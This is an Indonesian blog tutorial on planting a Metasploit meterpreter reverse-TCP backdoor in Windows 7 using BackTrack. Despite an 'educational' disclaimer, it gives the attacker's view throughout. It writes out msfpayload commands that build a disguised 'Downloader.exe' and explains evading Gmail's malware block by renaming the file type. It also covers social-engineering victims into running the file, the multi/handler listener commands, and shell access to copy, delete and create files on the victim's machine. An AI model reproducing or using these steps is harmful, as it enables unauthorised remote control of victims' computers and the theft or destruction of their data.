Rabu, 11 Maret 2015

CARA MENANAMKAN BACKDOOR DI SISTEM OPERASI DENGAN BACKTRACK

Pada post kali ini, gw akan membahas cara menanamkan baackdoor pada sistem operasi komputer, harap diingat artikel ini bertujuan untuk pendidikan dan mengetest sistem keamanan pada komputer, sebelum kita mulai, kita harus tau, apa sih backdoor itu?menurut Wikipedia, backdoor adalah merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). Disebut juga sebagai back door.Beberapa pengembang perangkat lunak menambahkan backdoor ke dalam program buatannya untuk tujuan merusak (atau tujuan yang mencurigakan). Sebagai contoh, sebuah backdoor dapat dimasukkan ke dalam kode di dalam sebuah situs belanja online (e-commerce) untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk di antaranya adalah kartu kredit dengan backdoor, kita dapat mengakses suatu sistem tanpa harus melalui proses seperti biasanya, menambah, menghapus, mengambil file dan lain lain .dalam tutorial berikut, akan menjelaskan cara menanam backdoor pada sistem operasi windows 7

Semakin banyaknya aplikasi eksploitasi memperkuat paradigma akan tidak adanya sistem yang aman. Bahkan sistem keamanan Windows 7 yang sudah di patch dari beberapa kelemahan yang terdapat pada varian sebelumnya   (Windows XP dan Vista) ternyata masih bisa dieksploitasi. Bahkan cara eksploitasi kelemahan tersebut  hampir sama dengan eksploitasi pada varian windows sebelumnya, menggunakan meterpreter. Serangan ini memang jenis serangan standar, akan tetapi masih bisa digunakan serta dipahami oleh user awam untuk mengerti akan kerawanan sistem dan bahaya aksi vandal yang dilakukan attacker dengan mengancam informasi rahasia user.  Pada tulisan ini, saya akan mencoba membuat sebuah backdoor menggunakan bantuan metasploit yang terdapat pada paket distribusi back|track. Tulisan ini tidak mendiskritkan mengenai kelemahan sebuah OS, setiap OS memiliki kelemahan masing-masing, begitu juga dengan Linux. Linux masih mungkin di eksploitasi sama dengan Windows, akan tetapi menggunakan metoda yang berbeda, Rootkit.
Langkah pertama yang perlu dilakukan untuk memasang backdoor pada target windows 7 adalah membuat file tersebut terlebih dahulu. Cara membuat file nya pun tergolong mudah.  cukup mengetikkan perintah di bawah ini pada terminal backt|track anda.
msfpayload windows/meterpreter/reverse_tcp LHOST=[IP Attacker] LPORT=[Port] x > /folderpenyimpanan/namafile.ekstensi
contoh :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.28.2 LPORT=4444 x > /root/Desktop/Downloader.exe


File backdoor yang dibuat oleh metasploit tersebut akan tersimpan pada Desktop back|track. Hal ini sesuai dengan media penyimpanan yang dipilih sebelumnya. Setelah file tersebut terbentuk, untuk mendistribusikannya, bisa menggunakan beberapa cara, bisa dengan bypass langsung/serang langsung pada target atau menggunakan teknik soceng terhadap korban. Untuk mendistribusikan dengan teknik soceng, attacker cukup mengupload file backdoor di internet atau bisa mengirimkan file tersebut kepada korban.
Gambar diatas merupakan screenshot dari percobaan mengirimkan file backdoor menggunakan e-mail. Dalam percobaan diatas, saya menggunakan layanan gmail untuk mendistribusikannya, akan tetapi gmail mem-block aksi yang dilakukan karena terindikasi file tersebut mengandung virus/malware. Untuk mengakali hal tersebut sangat mudah, bisa dengan melakukan compile ulang terhadap prgoram (cracking program) atau dengan cara sederhana merubah tipe data file tersebut dari exe menjadi sebuah file. Kali ini saya akan memilih opsi yang lebih cepat dengan merubah tipe data file dan mencoba mendistribusikannya kembali

Setelah melakukan perubahan terhadap tipe data file, website file hosting seperti 4shared sudah tidak melakukan block lagi terhadap file backdoor. Sampai pada tahapan ini tugas kita sebagai attacker sudah selesai dilakukan. Tinggal bagaimana cara mendsitribusikan file tersebut. Saya asumsikan disini, attacker berhasil mempengaruhi korban untuk mendownload file tersebut, dan merubah kembali tipe data file menjadi file executable.
Sampai tahap ini, berarti proses menanam backdooring sudah sampai 60 persen, attacker tinggal menunggu korban mengeksekusi file tersebut dan mengaktifkan eksploitasi pada komputer attacker. Untuk mengaktifkan eksploit sendiri dapat mengetikkan perintah dibawah ini pada software eksploitasi metasploit
msf exploit (handler) > use /exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST [IP Attacker]
msf exploit (handler) > exploit
contoh
msf exploit (handler) > use /exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST 192.168.28.2
msf exploit (handler) > exploit
apabila metasploit sudah memberikan respon seperti diatas, berarti attacker sudah siap melakukan keseluruhan persiapan dan tinggal menunggu file backdoor dijalankan oleh client. Apabila file tersebut sudah dijalankan oleh client, maka metasploit akan memberikan respon seperti gambar dibawah ini
Apabila sampai tahapan ini berhasil dilakukan, berarti kita berhasil menanam backdoor dan bisa mengontrol komputer korban. Kita bisa memindahkan file, meng-copy file dari komputer korban bahkan menghapus file tersebut. Untuk memastikan apakah komputer yang kita susupi memang komputer korban dapat mengetikkan perintah sysinfo dan perintah shell untuk masuk kedalam terminal CMD korban. Berikut ditampilkan contoh penulisan dan gambar hasil proses


Apabila sudah sesuai dengan properties dari komputer korban, berarti backdoor berhasil ditanam dan misi sudah berhasil dilakukan. Untuk memastikan apakah benar-benar bisa melakukan proses penulisan file, pengopyan file bahkan penghapusan file silahkan langsung melakukannya pada terminal yang ada. Contoh kali ini saya akan mencoba membuat sebuah folder yang bernama test_backdooring pada desktop korban
sampai tahapan ini berarti proses telah selesai dilakukan, tergantung kreatifitas attacker untuk memanfaatkan komputer tersebut.

0 komentar:

Posting Komentar